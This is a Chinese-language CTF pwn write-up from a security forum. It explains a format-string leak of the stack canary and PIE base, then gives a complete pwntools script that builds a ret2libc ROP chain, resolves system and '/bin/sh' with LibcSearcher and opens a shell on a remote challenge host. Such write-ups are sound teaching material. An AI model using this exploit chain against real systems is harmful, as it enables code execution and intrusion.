[分享]ctfpwn题考点retlibc，pie，canary-Pwn-看雪-安全社区|安全招聘|kanxue.com

[分享]ctfpwn题考点retlibc，pie，canary

发表于: 2023-12-4 12:24 3274

[分享]ctfpwn题考点retlibc，pie，canary

xinhu

2023-12-4 12:24

3274

今天来看一道pwn题
图片描述
可以看到canary和pie都开了
则需要拿到canary值还要piebase的基址

这是程序入口进入bird看看

明显看到有字符串漏洞
则可以通过格式化字符串直接泄漏canary和main+1c的地址

main+1c为箭头处
则开始考虑获取后门

没有后门字符串，则需要自己构造通过libc
exp如下

插入代码
import LibcSearcher
from pwn import *
context(log_level = "debug", arch = "amd64", os = "linux")
 
sh = remote('1.container.jingsai.apicon.cn',31185)
# sh=process('/home/xinhu/1/ezpie')
elf = ELF('/home/xinhu/Desktop/11/vuln')
# payload 1
sh.sendline(b'%11$p'+b' %13$p')
sh.recvuntil("I'm a bird and I'll steal your pie.\n")
data1=sh.recv()
canry=int(data1[0:18],16)
canry1=p64(canry)
main=int(data1[19:33],16)-0x1c
print(data1)
piebase=main-elf.symbols['main']
putsPlt = elf.plt['puts']+piebase
putsGot = elf.got['puts']+piebase
search=piebase+elf.symbols['search']
popRdiAddr = piebase+0x1443
retAddr=piebase+0x101a
sh.sendline(b'1'*72 +p64(canry)+b'1'*8+ p64(popRdiAddr) + p64(putsGot) + p64(putsPlt) + p64(search)) # skip
sh.recvuntil('Did u tell me where my binsh is ?\n')
sh.sendline(b'1')
# data=sh.recv()
data=u64(sh.recv(6) + b'\0\0')
# print(hex(data))
putsGotAddr = data
libc = LibcSearcher.LibcSearcher('puts', putsGotAddr & 0xfff)
libcBase = putsGotAddr - libc.dump('puts')
shstrAddr = libcBase + libc.dump('str_bin_sh')
systemAddr = libcBase + libc.dump('system')
# payload 2
sh.sendline(b'0'*72+p64(canry)+b'0'*8+ p64(popRdiAddr) + p64(shstrAddr) + p64(retAddr) + p64(systemAddr))
sh.sendline(b'1')
 
sh.interactive()